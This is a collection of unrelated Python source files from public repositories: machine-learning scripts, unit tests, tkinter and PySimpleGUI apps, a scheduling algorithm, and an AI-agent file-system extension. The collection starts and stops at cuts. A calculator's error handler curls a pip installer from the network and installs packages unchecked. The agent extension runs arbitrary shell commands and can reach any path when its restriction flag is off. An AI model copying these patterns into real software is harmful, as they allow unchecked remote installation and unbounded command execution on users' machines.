matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n#importing the dataset\r\ndataset=pd.read_csv(r\"Position_Salaries.csv\")\r\n\r\n# creating matrix of features\r\nX=dataset.iloc[:,1:2].values\r\n\r\n#creating dependant variable vector\r\ny=dataset.iloc[:,-1].values\r\n\r\n#splitting into training and test set\r\n\"\"\"from sklearn.model_selection import train_test_split\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)\"\"\"\r\n\r\n#creating linear regression model\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg=LinearRegression()\r\nlin_reg.fit(X,y)\r\n\r\n#creating polynomial regression model\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg=PolynomialFeatures(degree=4)\r\nX_poly=poly_reg.fit_transform(X)\r\n\"\"\"now again fitting linear model to X_poly\"\"\"\r\nlin_reg2=LinearRegression()\r\nlin_reg2.fit(X_poly,y)\r\n\r\n#visualing the results of linear model\r\nplt.scatter(X,y,color=\"red\")\r\nplt.plot(X,lin_reg.predict(X))\r\nplt.title(\"Position vs Salary(Linear Model)\")\r\nplt.xlabel(\"Position\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#Visualising the results of polynomial model\r\nX_grid=np.arange(min(X),max(X),0.1)\r\nX_grid=X_grid.reshape(len(X_grid),1)\r\nplt.scatter(X,y,color=\"red\")\r\nplt.plot(X_grid,lin_reg2.predict(poly_reg.fit_transform(X_grid)),color=\"blue\")\r\nplt.title(\"Position vs Salary(Polynomial Model)\")\r\nplt.xlabel(\"Position\")\r\nplt.ylabel(\"Salary\")\r\nplt.show()\r\n\r\n#predicting new results with linear model\r\nlin_reg.predict([[6.5]])\r\n\r\n#predicting new results with linear model\r\nlin_reg2.predict(poly_reg.fit_transform([[8]]))","repo_name":"kingslayer2357/ML_Basics_PolynomialRegression","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29477941363","text":"import numpy as np\nimport numpy.testing as npt\nimport pandas as pd\nfrom stumpy import core\nimport pytest\n\n\ndef naive_rolling_window_dot_product(Q, T):\n window = len(Q)\n result = np.zeros(len(T) - window + 1)\n for i in range(len(result)):\n result[i] = np.dot(T[i : i + window], Q)\n return result\n\n\ndef test_check_dtype_float32():\n assert core.check_dtype(np.random.rand(10).astype(np.float32))\n\n\ndef test_check_dtype_float64():\n assert core.check_dtype(np.random.rand(10))\n\n\ndef test_df_to_array():\n a = np.random.rand(10)\n assert core.check_dtype(core.df_to_array(a))\n df = pd.Series(a)\n assert core.check_dtype(core.df_to_array(df))\n\n\ntest_data = [\n (np.array([-1, 1, 2], dtype=np.float64), np.array(range(5), dtype=np.float64)),\n (\n np.array([9, 8100, -60], dtype=np.float64),\n np.array([584, -11, 23, 79, 1001], dtype=np.float64),\n ),\n (np.random.uniform(-1000, 1000, [8]), np.random.uniform(-1000, 1000, [64])),\n]\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_sliding_dot_product(Q, T):\n left = naive_rolling_window_dot_product(Q, T)\n right = core.sliding_dot_product(Q, T)\n npt.assert_almost_equal(left, right)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_compute_mean_std(Q, T):\n m = Q.shape[0]\n left_μ_Q = np.sum(Q) / m\n left_σ_Q = np.sqrt(np.sum(np.square(Q - left_μ_Q) / m))\n left_M_T = np.mean(core.rolling_window(T, m), axis=1)\n left_Σ_T = np.std(core.rolling_window(T, m), axis=1)\n right_μ_Q, right_σ_Q = core.compute_mean_std(Q, m)\n right_M_T, right_Σ_T = core.compute_mean_std(T, m)\n npt.assert_almost_equal(left_μ_Q, right_μ_Q)\n npt.assert_almost_equal(left_σ_Q, right_σ_Q)\n npt.assert_almost_equal(left_M_T, right_M_T)\n npt.assert_almost_equal(left_Σ_T, right_Σ_T)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_calculate_distance_profile(Q, T):\n m = Q.shape[0]\n left = np.linalg.norm(\n core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1\n )\n QT = core.sliding_dot_product(Q, T)\n μ_Q, σ_Q = core.compute_mean_std(Q, m)\n M_T, Σ_T = core.compute_mean_std(T, m)\n right = core.calculate_distance_profile(m, QT, μ_Q, σ_Q, M_T, Σ_T)\n npt.assert_almost_equal(left, right)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_mueen_calculate_distance_profile(Q, T):\n m = Q.shape[0]\n left = np.linalg.norm(\n core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1\n )\n right = core.mueen_calculate_distance_profile(Q, T)\n npt.assert_almost_equal(left, right)\n\n\n@pytest.mark.parametrize(\"Q, T\", test_data)\ndef test_mass(Q, T):\n m = Q.shape[0]\n left = np.linalg.norm(\n core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1\n )\n right = core.mass(Q, T)\n npt.assert_almost_equal(left, right)\n","repo_name":"adhankhar24/time-series-stump","sub_path":"tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14959545892","text":"import tkinter as tk\r\nimport math\r\n\r\ntry:\r\n import tkinter as tk\r\n from tkinter import StringVar, IntVar, ttk\r\n import matplotlib.pyplot as plt\r\n import numpy as np\r\n\r\nexcept ImportError:\r\n from subprocess import call\r\n from tkinter import StringVar, ttk, Tk\r\n\r\n def download():\r\n text_var.set(\"Der Download beginnt...\")\r\n fenster.update()\r\n call(\"curl https://bootstrap.pypa.io/get-pip.py -o get -pip.py\")\r\n call(\"python -m pip install -I pip\")\r\n call(\"pip install matplotlib\")\r\n call(\"pip install numpy\")\r\n # call(\"pip install ttkthemes\")\r\n text_var.set(\"Download abgeschlossen.\")\r\n fenster.update()\r\n fenster.after(5000,fenster.destroy)\r\n\r\n fenster = Tk()\r\n fenster.config(bg=\"#3b3b3b\")\r\n text_var = StringVar()\r\n text_var.set(\"Fehlende Daten downloaden?\")\r\n ttk.Label(fenster,textvariable=text_var).grid(column=0,row=0,pady=4,padx=4)\r\n ttk.Button(fenster,text=\"Download\",command=download).grid(column=0,row=1,pady=4,padx=4)\r\n\r\ndef ft():\r\n \r\n### Quadratische Formel Fenster ### \r\n \r\n def qf():\r\n def loesen():\r\n \r\n labelErgebnis = tk.Label(master=framel, text=\"\")\r\n labelErgebnis.pack(side=\"right\", padx=5, pady=5)\r\n labelErgebnis2 = tk.Label(master=framel2, text=\"\")\r\n labelErgebnis2.pack(side=\"right\", padx=5, pady=5)\r\n labelE2 = tk.Label(master=framel2, text=\"Nst. x2:\", bg=\"#3b3b3b\", fg=\"white\")\r\n labelE2.pack(padx=5, pady=5)\r\n label = tk.Label(master=framel, text=\"Nst. x1:\", bg=\"#3b3b3b\", fg=\"white\")\r\n label.pack(padx=5, pady=5)\r\n \r\n try: \r\n a = int(entry1.get())\r\n b = int(entry2.get())\r\n c = int(entry3.get())\r\n \r\n ### Nullstelle ###\r\n \r\n x1 = (-b-math.sqrt(b**2-4*a*c)) / (2*a)\r\n x1 = round(x1, 2)\r\n x2 = (-b+math.sqrt(b**2-4*a*c)) / (2*a)\r\n x2 = round(x2, 2)\r\n labelErgebnis.config(text=str(x1))\r\n labelErgebnis2.config(text=str(x2))\r\n \r\n ### Symetrie ###\r\n \r\n \r\n ### Bildung Graph ###\r\n x = np.linspace(-5,5,60)\r\n y = a*x**2+b*x+c\r\n \r\n plt.xlabel(\"x-Achse\")\r\n plt.ylabel(\"y-Achse\")\r\n plt.title(str(a) + \"x^2 +\" + str(b) + \"x +\" + str(c))\r\n plt.grid(True)\r\n plt.plot(x,y)\r\n plt.show()\r\n \r\n except ValueError:\r\n labelErgebnis.config(text=\"Fehler, Ungültige Werte\")\r\n labelErgebnis2.config(text=\"Fehler, Ungültige Werte\")\r\n def back_qf():\r\n window_ft.deiconify()\r\n window_qf.destroy()\r\n \r\n window_qf = tk.Toplevel(window)\r\n window_qf.title(\"Recht. Dreieck\")\r\n window_qf.config(bg=\"#CDC9C9\")\r\n window.withdraw()\r\n \r\n frame1 = tk.Frame(master=window_qf, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n frameba = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frameba.pack(side=\"bottom\")\r\n framel2 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n framel2.pack(side=\"bottom\", padx=5, pady=5)\r\n framel = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n framel.pack(side=\"bottom\", padx=5, pady=5)\r\n button = tk.Button(master=frame1, text=\"Lösen\", command=loesen, bg=\"#303030\", fg=\"white\")\r\n button.pack(side=\"bottom\", padx=5, pady=5)\r\n framec = tk.Frame(master=frame1, bg=\"#BABABA\")\r\n framec.pack(side=\"bottom\")\r\n frameb = tk.Frame(master=frame1, bg=\"#BABABA\")\r\n frameb.pack(side=\"bottom\")\r\n framea = tk.Frame(master=frame1, bg=\"#BABABA\")\r\n framea.pack(side=\"bottom\")\r\n \r\n label1 = tk.Label(master=frame1, text=\"f(x)=ax^2+bx+c\", bg=\"#3b3b3b\", fg=\"white\")\r\n label1.pack(padx=5, pady=5)\r\n \r\n label2 = tk.Label(master=framea, text=\"a\", bg=\"#3b3b3b\", fg=\"white\")\r\n label2.pack(side=\"left\", padx=5, pady=5)\r\n entry1 = tk.Entry(master=framea)\r\n entry1.pack(padx=5, pady=5)\r\n \r\n label3 = tk.Label(master=frameb, text=\"b\", bg=\"#3b3b3b\", fg=\"white\")\r\n label3.pack(side=\"left\", padx=5, pady=5)\r\n entry2 = tk.Entry(master=frameb)\r\n entry2.pack(padx=5, pady=5)\r\n \r\n label4 = tk.Label(master=framec, text=\"c\", bg=\"#3b3b3b\", fg=\"white\")\r\n label4.pack(side=\"left\", padx=5, pady=5)\r\n entry3 = tk.Entry(master=framec)\r\n entry3.pack(padx=5, pady=5)\r\n \r\n button_back = tk.Button(master=frameba, text=\"Back\", command=back_qf, bg=\"#666666\", fg=\"white\")\r\n button_back.pack(padx=5, pady=5)\r\n \r\n def back():\r\n window.deiconify()\r\n window_ft.destroy()\r\n\r\n### Lineare Funktion Fenster ###\r\n\r\n def lft():\r\n def back_lft():\r\n window_ft.deiconify()\r\n window_lft.destroy()\r\n \r\n def loesen():\r\n try:\r\n framehl = tk.Frame(master=frame1)\r\n framehl.pack(side=\"bottom\")\r\n frame5 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n frame5.pack(side=\"bottom\",padx=5, pady=5, fill=\"both\")\r\n frame4 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n frame4.pack(side=\"bottom\",padx=5, pady=5, fill=\"both\")\r\n label6 = tk.Label(master=frame5, text=\"Monotonie:\", bg=\"#3b3b3b\", fg=\"white\")\r\n label6.pack(side=\"left\", padx=5, pady=5)\r\n label7 = tk.Label(master=frame5, text=\"\")\r\n label7.pack(padx=5, pady=5)\r\n label5 = tk.Label(master=frame4, text=\"Nulstelle:\", bg=\"#3b3b3b\", fg=\"white\")\r\n label5.pack(side=\"left\",padx=5, pady=5)\r\n label4 = tk.Label(master=frame4, text=\"\")\r\n label4.pack(padx=5, pady=5)\r\n \r\n m = int(entryA.get())\r\n n = int(entryB.get())\r\n \r\n ### Nullstelle ###\r\n x1 = -(n/m)\r\n x1 = round(x1, 2)\r\n label4.configure(text=x1)\r\n \r\n ### Monotonie m ###\r\n sm = n/m\r\n if sm > 0:\r\n label7.config(text=\"Steigt\")\r\n elif sm < 0:\r\n label7.config(text=\"Fällt\")\r\n \r\n ### Bildung Graph ###\r\n x = np.linspace(-5,5,60)\r\n y = m*x+n\r\n \r\n plt.xlabel(\"x-Achse\")\r\n plt.ylabel(\"y-Achse\")\r\n plt.title(str(m) + \"*x + \" + str(n))\r\n plt.grid(True)\r\n plt.plot(x,y)\r\n plt.show()\r\n \r\n except ValueError:\r\n label4.config(text=\"Fehler, Ungültiger Wert\")\r\n \r\n \r\n window_lft = tk.Toplevel(window)\r\n window_lft.title(\"Lineare Funktion\")\r\n window_lft.config(bg=\"#CDC9C9\")\r\n window_lft.resizable(False, False)\r\n window_ft.withdraw\r\n \r\n \r\n framef = tk.Frame(master=window_lft, bg=\"#CDC9C9\")\r\n framef.pack(side=\"top\")\r\n frame2 = tk.Frame(master=window_lft, bg=\"#BABABA\")\r\n frame2.pack(side=\"top\", fill=\"both\")\r\n frame3 = tk.Frame(master=window_lft, bg=\"#BABABA\")\r\n frame3.pack(side=\"top\", fill=\"both\")\r\n frame1 = tk.Frame(master=window_lft, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n frame5 = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frame5.pack(side=\"top\")\r\n frameba = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frameba.pack(side=\"bottom\")\r\n \r\n \r\n labelf = tk.Label(master=framef, text=\"f(x)=mx+n\", bg=\"#3b3b3b\", fg=\"white\")\r\n labelf.pack(padx=5, pady=5)\r\n \r\n label1 = tk.Label(master=frame2, text=\"m\", bg=\"#3b3b3b\", fg=\"white\")\r\n label1.pack(side=\"left\",padx=5, pady=5)\r\n \r\n entryA = tk.Entry(master=frame2)\r\n entryA.pack(side=\"top\",padx=5, pady=5)\r\n \r\n label2 = tk.Label(master=frame3, text=\"n\", bg=\"#3b3b3b\", fg=\"white\")\r\n label2.pack(side=\"left\",padx=5, pady=5, expand=True, fill=\"both\")\r\n\r\n entryB = tk.Entry(master=frame3)\r\n entryB.pack(side=\"top\",padx=5, pady=5)\r\n \r\n button = tk.Button(master=frame5, text=\"Lösen\", bg=\"#303030\", fg=\"white\", command=loesen)\r\n button.pack(padx=5, pady=5)\r\n \r\n\r\n \r\n button_back = tk.Button(master=frameba , text=\"Back\", command=back_lft, bg=\"#666666\", fg=\"white\")\r\n button_back.pack(padx=5, pady=5)\r\n\r\n### Funktionen Fenster Main ###\r\n\r\n window_ft = tk.Toplevel(window)\r\n window_ft.title(\"Funktionen\")\r\n window_ft.config(bg=\"#CDC9C9\")\r\n window.withdraw()\r\n \r\n frame1 = tk.Frame(master=window_ft, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n \r\n lft_button = tk.Button(master=frame1, text=\"Lineare Funktion\", command=lft, bg=\"#303030\", fg=\"white\")\r\n lft_button.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n qf_button = tk.Button(master=frame1, text=\"Quadratische Funktion\", command=qf, bg=\"#303030\", fg=\"white\")\r\n qf_button.pack(side=\"top\",padx=8, pady=8, fill=\"both\")\r\n button = tk.Button(master=frame1, text=\"Back\", command=back, bg=\"#666666\", fg=\"white\")\r\n button.pack(padx=10, pady=5)\r\n\r\n### Quersumme Fenster ###\r\n\r\ndef qs():\r\n def loesen():\r\n try:\r\n number = entry.get()\r\n qs_l = sum([int(i) for i in number])\r\n labelErgebnis.config(text=qs_l)\r\n except ValueError:\r\n labelErgebnis.config(text=\"Fehler, Ungültige Werte\")\r\n def back():\r\n window.deiconify()\r\n window_qs.destroy()\r\n \r\n window_qs = tk.Toplevel(window)\r\n window_qs.title(\"Quersumme\")\r\n window_qs.config(bg=\"#CDC9C9\")\r\n window.withdraw()\r\n \r\n frame1 = tk.Frame(master=window_qs, bg=\"#CDC9C9\")\r\n frame1.pack(side=\"top\")\r\n frame3 = tk.Frame(master=frame1, bg=\"#CDC9C9\")\r\n frame3.pack(side=\"bottom\")\r\n frame2 = tk.Frame(master=frame1, bg=\"#3b3b3b\")\r\n frame2.pack(side=\"bottom\", padx=5, pady=5)\r\n \r\n entry = tk.Entry(master=frame1)\r\n entry.pack(padx=10, pady=5)\r\n \r\n button = tk.Button(master=frame3, text=\"Back\", command=back, bg=\"#666666\", fg=\"white\")\r\n button.pack(padx=10, pady=5, side=\"top\")\r\n \r\n button = tk.Button(master=frame1, text=\"Lösen\", command=loesen, bg=\"#303030\", fg=\"white\")\r\n button.pack(padx=5, pady=5)\r\n \r\n labelErgebnis = tk.Label(master=frame2, text=\"\")\r\n labelErgebnis.pack(side=\"right\", padx=5, pady=5)\r\n label = tk.Label(master=frame2, text=\"Ergebnis:\", bg=\"#3b3b3b\", fg=\"white\")\r\n label.pack(padx=5, pady=5)\r\n\r\n### Main Window ###\r\n \r\nwindow = tk.Tk()\r\nwindow.title(\"Formel Rechner\")\r\nwindow.resizable(False, False)\r\n\r\nmainFrame = tk.Frame(master=window, bg=\"#CDC9C9\") #Hintergrund Standard Farbe\r\nmainFrame.pack(side=\"top\")\r\n\r\nqs_button = tk.Button(master=mainFrame, text=\"Quersumme\", command=qs, bg=\"#303030\", fg=\"white\")\r\nqs_button.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n\r\nqua_formel = tk.Button(master=mainFrame, text=\"Funktionen\", command=ft, bg=\"#303030\", fg=\"white\")\r\nqua_formel.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n\r\ntest = tk.Button(master=mainFrame, text=\"Soon\", bg=\"#303030\", fg=\"white\")\r\ntest.pack(side=\"top\", padx=8, pady=8, fill=\"both\")\r\n\r\nclose_button = tk.Button(master=mainFrame, text=\"Close\", command=window.destroy, bg=\"#666666\", fg=\"white\")\r\nclose_button.pack(padx=10, pady=5)\r\n\r\nwindow.mainloop()","repo_name":"gndre-oj/simple_formula_calculator","sub_path":"simple_formula_calculator.py","file_name":"simple_formula_calculator.py","file_ext":"py","file_size_in_byte":11736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72679754409","text":"import debayer\nimport numpy as np\nimport pytest\nimport torch\n\nColors = [\n (1.0, 0.0, 0.0),\n (0.0, 1.0, 0.0),\n (0.0, 0.0, 1.0),\n]\n\n\ndef _bayer_to_torch(x: np.ndarray, dtype=torch.float32, dev: str = \"cpu\"):\n return torch.tensor(x).to(dtype).unsqueeze(0).unsqueeze(0).to(dev)\n\n\n@pytest.mark.parametrize(\"layout\", debayer.Layout)\n@pytest.mark.parametrize(\"color\", Colors)\n@pytest.mark.parametrize(\n \"klass\", [debayer.Debayer2x2, debayer.Debayer3x3, debayer.Debayer5x5]\n)\ndef test_monochromatic_images(layout, color, klass):\n \"\"\"Algorithms should be able to reconstruct monochromatic bayer images.\"\"\"\n rgb = np.tile(\n np.array(color, dtype=np.float32).reshape(1, 1, -1),\n (6, 8, 1),\n )\n b = _bayer_to_torch(debayer.utils.rgb_to_bayer(rgb, layout=layout))\n r = klass(layout=layout)(b)\n\n # import matplotlib.pyplot as plt\n # plt.imshow(r.squeeze().permute(1, 2, 0).cpu().to(torch.float32).numpy())\n # plt.show()\n assert r.shape == (1, 3, 6, 8)\n assert (r == torch.tensor(color).view(1, -1, 1, 1)).all()\n","repo_name":"cheind/pytorch-debayer","sub_path":"tests/test_debayer.py","file_name":"test_debayer.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"53"} +{"seq_id":"70544263850","text":"import Character as dnd\nimport PySimpleGUI as sg\nimport logging\nimport sys\nimport images\nimport configparser\n\nclass Options:\n def __init__(self):\n self.config = configparser.ConfigParser()\n try:\n self.load_options()\n except:\n logging.error('Failed to load preferences!')\n self.mod_size = 'Big'\n self.theme = 'DarkGrey'\n self.save_options()\n sg.theme(self.theme)\n \n def get_options_file(self):\n filename = str(dnd.path) + '\\preferences.ini'\n return filename\n\n def save_options(self):\n self.config['options'] = {'mod_size':self.mod_size,\n 'theme':self.theme}\n filename = self.get_options_file()\n with open(filename, 'w') as configfile:\n self.config.write(configfile)\n logging.info('Options Saved')\n \n def load_options(self):\n self.config.read(self.get_options_file())\n self.mod_size = self.config['options']['mod_size']\n self.theme = self.config['options']['theme']\n \n def change_options(self):\n col1 = [[sg.T('Mod Size')],\n [sg.T('Theme')]\n ]\n col2 = [[sg.Combo(values = ['Big', 'Small'], default_value = self.mod_size, key = 'mod_size')],\n [sg.Combo(values = sg.theme_list(), default_value = self.theme, key = 'theme')]\n ]\n layout = [[sg.Column(col1, element_justification = 'l'), sg.Column(col2, element_justification = 'l')],\n [sg.Button('Save')]\n ]\n window = sg.Window('Options', layout, grab_anywhere=True, resizable=True, icon = images.dragon)\n while True:\n event, values = window.read()\n if event is None:\n break\n if event == 'Save':\n self.mod_size = values['mod_size']\n self.theme = values['theme']\n sg.theme(self.theme)\n self.save_options()\n sg.Popup('Options Saved', icon = images.dragon)\n break\n window.close()","repo_name":"alexteeter/DigitalCharacterSheet","sub_path":"src/options/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13761153683","text":"import math\nimport pandas as pd\nimport numpy as np\nfrom collections import defaultdict\nfrom copy import deepcopy\nfrom algorithms.graph.graph_package.graph import Graph\nfrom algorithms.graph.graph_package.graph_vertex import Vertex\n\n\n\nclass PrecSchedule:\n def __init__(self, file_name=None, graph=None):\n if file_name is not None and graph is not None:\n self.file_name = file_name\n self.fi_list, self.pi_list, self.adj_mat = self.__init_csv()\n self.graph = self.__graph_init(graph)\n self.schedule = self.__lawler()\n # else:\n # self.fi_list, self.pi_list, self.adj_mat = None, None, None\n # self.graph = None\n # self.schedule = None\n\n\n def __init_csv(self):\n data_frame = pd.read_csv(self.file_name)\n data_frame_fi = list(map(lambda x: float(x), data_frame.columns.values))\n data_frame_pi = list(map(lambda x: int(x), data_frame.iloc[0]))\n data_frame_adj_matrix = data_frame.to_numpy()[1:]\n return data_frame_fi, data_frame_pi, data_frame_adj_matrix\n\n def __str__(self):\n return f'{self.file_name}:\\n fi_list: {self.fi_list}\\n pi_list: {self.pi_list}\\n adj_matrix:\\n{self.adj_mat}\\n'\n\n def __graph_init(self, graph):\n mat_graph = defaultdict(dict)\n for i in range(len(self.adj_mat)):\n for j in range(len(self.adj_mat[0])):\n if self.adj_mat[i][j] != 0:\n mat_graph[i][j] = self.adj_mat[i][j]\n print(mat_graph)\n\n for src, neighbors in mat_graph.items():\n for dst in neighbors.keys():\n graph.add_edge(src, dst)\n print(graph)\n return graph\n\n def display_graph(self):\n print(self.graph)\n\n def compute_schedule(self):\n return self.schedule\n\n @staticmethod\n def combine_schedules(first, second, connection_mat_file_name):\n df = pd.read_csv(connection_mat_file_name, header=None)\n conn_mat = df.to_numpy()\n combined_mat = PrecSchedule.__concatenate_mats(left=first.adj_mat,\n diagonal=second.adj_mat,\n right=conn_mat)\n combined_fi = first.fi_list + second.fi_list\n combined_pi = first.pi_list + second.pi_list\n\n\n combined = PrecSchedule()\n g = Graph(container='list', directed=True)\n combined.fi_list, combined.pi_list, combined.adj_mat = combined_fi, combined_pi, combined_mat\n combined.graph = combined.__graph_init(g)\n combined.schedule = combined.__lawler()\n\n return combined.schedule\n\n\n @staticmethod\n def __concatenate_mats(left, diagonal, right):\n zeros_pad = np.zeros(shape=(diagonal.shape[0], diagonal.shape[0]), dtype=int)\n upper_mat_combine = np.concatenate((left, right), axis=1)\n lower_mat_combine = np.concatenate((zeros_pad, diagonal), axis=1)\n return np.concatenate((upper_mat_combine, lower_mat_combine))\n\n def __lawler(self):\n graph = deepcopy(self.graph)\n prc_times = self.pi_list.copy()\n p = sum(self.fi_list)\n s = self.graph.get_vertices()\n sched_res = []\n n = len(s)\n\n for k in range(n, 0, -1):\n f_k = math.inf\n taken_job = Vertex(key=-1, idx=0)\n taken_idx = 0\n # find job j in s such that out deg is 0 and fj(p) is minimal\n for idx, job in enumerate(s):\n # check if out degree is 0\n if graph.degree(job.key)[1] == 0:\n if f_k > (self.fi_list[job.key] * p):\n f_k = self.fi_list[job.key] * p\n taken_job = job\n taken_idx = idx\n\n # update given data\n if taken_job.key != -1:\n s.remove(taken_job)\n sched_res.append(taken_job)\n p = p - prc_times[taken_idx]\n prc_times.pop(taken_idx)\n graph.remove_vertex(taken_job.key)\n\n # return the schedule\n return sched_res[::-1]\n\n\nif __name__ == '__main__':\n g_fry = Graph(container='list', directed=True)\n fry = PrecSchedule('data/Fry.csv', g_fry)\n sched_fry = fry.compute_schedule()\n for x in sched_fry:\n print(x.key, end=' ')\n print()\n fry.display_graph()\n\n g_leela = Graph(container='list', directed=True)\n leela = PrecSchedule('data/Leela.csv', g_leela)\n sched_leela = leela.compute_schedule()\n for x in sched_leela:\n print(x.key, end=' ')\n print()\n leela.display_graph()\n\n comb = PrecSchedule.combine_schedules(fry, leela, 'data/Fry_Leela.csv')\n for x in comb:\n print(x.key, end=' ')","repo_name":"shalip91/Algorithms","sub_path":"scheduling/1_prec_fmax__lawler.py","file_name":"1_prec_fmax__lawler.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2810906063","text":"from typing import List\nfrom Extensions import Extensions\nimport os\nimport subprocess\nfrom safeexecute import execute_python_code\nimport logging\nimport re\n\n\nclass file_system(Extensions):\n def __init__(\n self,\n WORKING_DIRECTORY: str = \"./WORKSPACE\",\n WORKING_DIRECTORY_RESTRICTED: bool = True,\n **kwargs,\n ):\n self.WORKING_DIRECTORY = WORKING_DIRECTORY\n self.WORKING_DIRECTORY_RESTRICTED = WORKING_DIRECTORY_RESTRICTED\n if not os.path.exists(self.WORKING_DIRECTORY):\n os.makedirs(self.WORKING_DIRECTORY)\n self.commands = {\n \"Write to File\": self.write_to_file,\n \"Read File\": self.read_file,\n \"Search Files\": self.search_files,\n \"Append to File\": self.append_to_file,\n \"Execute Python File\": self.execute_python_file,\n \"Delete File\": self.delete_file,\n \"Execute Shell\": self.execute_shell,\n \"Indent String for Python Code\": self.indent_string,\n \"Generate Commands Dictionary\": self.generate_commands_dict,\n \"Get CSV Preview\": self.get_csv_preview,\n }\n self.WORKING_DIRECTORY = WORKING_DIRECTORY\n\n async def execute_python_file(self, file: str):\n logging.info(f\"Executing file '{file}' in workspace '{self.WORKING_DIRECTORY}'\")\n\n if not file.endswith(\".py\"):\n return \"Error: Invalid file type. Only .py files are allowed.\"\n\n file_path = os.path.join(self.WORKING_DIRECTORY, file)\n\n if not os.path.isfile(file_path):\n return f\"Error: File '{file}' does not exist.\"\n\n if self.we_are_running_in_a_docker_container():\n result = subprocess.run(\n f\"python {file_path}\", capture_output=True, encoding=\"utf8\", shell=True\n )\n if result.returncode == 0:\n return result.stdout\n else:\n return f\"Error: {result.stderr}\"\n with open(file_path, \"r\") as f:\n code = f.read()\n return execute_python_code(code=code, working_directory=self.WORKING_DIRECTORY)\n\n async def execute_shell(self, command_line: str) -> str:\n current_dir = os.getcwd()\n os.chdir(current_dir)\n logging.info(\n f\"Executing command '{command_line}' in working directory '{os.getcwd()}'\"\n )\n result = subprocess.run(command_line, capture_output=True, shell=True)\n output = f\"STDOUT:\\n{result.stdout}\\nSTDERR:\\n{result.stderr}\"\n\n os.chdir(current_dir)\n\n return output\n\n @staticmethod\n def we_are_running_in_a_docker_container() -> bool:\n return os.path.exists(\"/.dockerenv\")\n\n def safe_join(self, base: str, paths) -> str:\n if \"/path/to/\" in paths:\n paths = paths.replace(\"/path/to/\", \"\")\n if str(self.WORKING_DIRECTORY_RESTRICTED).lower() == \"true\":\n new_path = os.path.normpath(os.path.join(base, *paths.split(\"/\")))\n if not os.path.exists(new_path):\n if \".\" not in new_path:\n os.makedirs(new_path)\n else:\n new_path = os.path.normpath(os.path.join(\"/\", *paths))\n if not os.path.exists(new_path):\n os.makedirs(new_path)\n return new_path\n\n async def read_file(self, filename: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n with open(filepath, \"r\", encoding=\"utf-8\") as f:\n content = f.read()\n return content\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def write_to_file(self, filename: str, text: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n directory = os.path.dirname(filepath)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(filepath, \"w\", encoding=\"utf-8\") as f:\n f.write(text)\n return \"File written to successfully.\"\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def append_to_file(self, filename: str, text: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n if not os.path.exists(filepath):\n with open(filepath, \"w\") as f:\n f.write(text)\n else:\n with open(filepath, \"a\") as f:\n f.write(text)\n return \"Text appended successfully.\"\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def delete_file(self, filename: str) -> str:\n try:\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n os.remove(filepath)\n return \"File deleted successfully.\"\n except Exception as e:\n return f\"Error: {str(e)}\"\n\n async def search_files(self, directory: str) -> List[str]:\n found_files = []\n\n if directory in {\"\", \"/\"}:\n search_directory = self.WORKING_DIRECTORY\n else:\n search_directory = self.safe_join(\n base=self.WORKING_DIRECTORY, paths=directory\n )\n\n for root, _, files in os.walk(search_directory):\n for file in files:\n if file.startswith(\".\"):\n continue\n relative_path = os.path.relpath(\n os.path.join(root, file), self.WORKING_DIRECTORY\n )\n found_files.append(relative_path)\n\n return found_files\n\n async def indent_string(self, string: str, indents: int = 1):\n if indents == 1:\n indent = \" \"\n else:\n indent = \" \" * indents\n lines = string.split(\"\\n\")\n indented_lines = [(indent + line) for line in lines]\n indented_string = \"\\n\".join(indented_lines)\n return indented_string\n\n async def generate_commands_dict(self, python_file_content):\n function_names = re.findall(r\"async def (.*?)\\(\", 